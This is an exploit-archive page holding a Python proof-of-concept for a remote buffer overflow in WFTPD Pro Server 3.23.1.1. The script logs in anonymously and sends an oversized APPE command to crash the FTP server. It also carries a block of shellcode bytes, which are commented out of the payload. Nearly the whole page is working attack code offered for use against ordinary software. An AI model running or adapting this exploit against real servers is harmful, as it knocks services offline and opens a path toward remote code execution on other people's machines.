WFTPD Pro Server 3.23.1.1 (APPE) Remote Buffer Overflow PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : WFTPD Pro Server 3.23.1.1 (APPE) Remote Buffer Overflow PoC
# Published : 2006-11-07
# Author : Joxean Koret
# Previous Title : WinZIP <= 10.0.7245 (FileView ActiveX Control) Stack Overflow PoC
# Next Title : WarFTPd 1.82.00-RC11 Remote Denial of Service Exploit

#!/usr/bin/env python

import sys
import struct
import ftplib

print "WFTPD Pro Server 3.23.1.1 Buffer Overflow (Only a DOS currently, simple POC)"
print "Copyright (c) Joxean Koret"
print

target = "192.168.1.13"
targetPort = "21"

try:
    ftp = ftplib.FTP()

    print "[+] Connecting to target "
    msg = ftp.connect(target, targetPort)
    print "[+] Ok. Target banner"
    print msg
    print
    print "[+] Trying to logging anonymously"
    msg = ftp.login() # Anonymous
    print "[+] Ok. Message"
    print msg
    print
except:
    print "[!] Exploit doesn't work. " + str(sys.exc_info()[1])
    sys.exit(0)


a = "\\A:"

for i in range(6):
    a += a

print "[+] Padding length " + str(len(a)) + " bytes"

b = "ABCD"

for i in range(4):
    b += b

a = a + "ABCD"*10 + b

shellCode = ""
shellCode += "x29xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13xec"
shellCode += "x9bx26x8cx83xebxfcxe2xf4x10xf1xcdxc1x04x62xd9x73"
shellCode += "x13xfbxadxe0xc8xbfxadxc9xd0x10x5ax89x94x9axc9x07"
shellCode += "xa3x83xadxd3xccx9axcdxc5x67xafxadx8dx02xaaxe6x15"
shellCode += "x40x1fxe6xf8xebx5axecx81xedx59xcdx78xd7xcfx02xa4"
shellCode += "x99x7exadxd3xc8x9axcdxeax67x97x6dx07xb3x87x27x67"
shellCode += "xefxb7xadx05x80xbfx3axedx2fxaaxfdxe8x67xd8x16x07"
shellCode += "xacx97xadxfcxf0x36xadxccxe4xc5x4ex02xa2x95xcaxdc"
shellCode += "x13x4dx40xdfx8axf3x15xbex84xecx55xbexb3xcfxd9x5c"
shellCode += "x84x50xcbx70xd7xcbxd9x5axb3x12xc3xeax6dx76x2ex8e"
shellCode += "xb9xf1x24x73x3cxf3xffx85x19x36x71x73x3axc8x75xdf"
shellCode += "xbfxc8x65xdfxafxc8xd9x5cx8axf3x37xd0x8axc8xafx6d"
shellCode += "x79xf3x82x96x9cx5cx71x73x3axf1x36xddxb9x64xf6xe4"
shellCode += "x48x36x08x65xbbx64xf0xdfxb9x64xf6xe4x09xd2xa0xc5"
shellCode += "xbbx64xf0xdcxb8xcfx73x73x3cx08x4ex6bx95x5dx5fxdb"
shellCode += "x13x4dx73x73x3cxfdx4cxe8x8axf3x45xe1x65x7ex4cxdc"
shellCode += "xb5xb2xeax05x0bxf1x62x05x0exaaxe6x7fx46x65x64xa1"
shellCode += "x12xd9x0ax1fx61xe1x1ex27x47x30x4exfex12x28x30x73"
shellCode += "x99xdfxd9x5axb7xccx74xddxbdxcax4cx8dxbdxcax73xdd"
shellCode += "x13x4bx4ex21x35x9exe8xdfx13x4dx4cx73x13xacxd9x5c"
shellCode += "x67xccxdax0fx28xffxd9x5axbex64xf6xe4x1cx11x22xd3"
shellCode += "xbfx64xf0x73x3cx9bx26x8c"

a = a + "JOXEAN" #+ shellCode

print "[+] Exploiting with a buffer of " + str(len(a)) + " byte(s) ... "

try:
    msg = ftp.sendcmd("APPE " + a)
    print "[!] Exploit doesn't work [" + msg + "]"
except:
    print "[+] Exploit apparently works. Trying to verify it ... "

    try:
        ftp.connect(target, targetPort)
        print "[!] No, it doesn't work [" + str(sys.exc_info()[1]) + "] :("
    except:
        print "[!] Ok. Server is dead, exploit successfully executed. "

# www.Syue.com [2006-11-07]